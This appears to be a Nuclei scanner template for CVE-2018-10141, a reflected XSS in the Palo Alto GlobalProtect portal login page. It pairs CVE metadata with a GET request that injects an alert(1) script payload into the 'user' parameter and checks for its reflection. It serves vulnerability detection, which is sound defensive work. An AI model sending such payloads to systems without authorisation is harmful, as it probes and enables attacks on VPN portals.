id: CVE-2018-10141 info: name: GlobalProtect Login page XSS author: dhiyaneshDk description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 tags: globalprotect,xss,cve,cve2018,vpn classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2018-10141 cwe-id: CWE-79 requests: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x' matchers-condition: and matchers: - type: word words: - 'var valueUser = "j";-alert(1)-"x";' part: body - type: word words: - "text/html" part: header - type: status status: - 200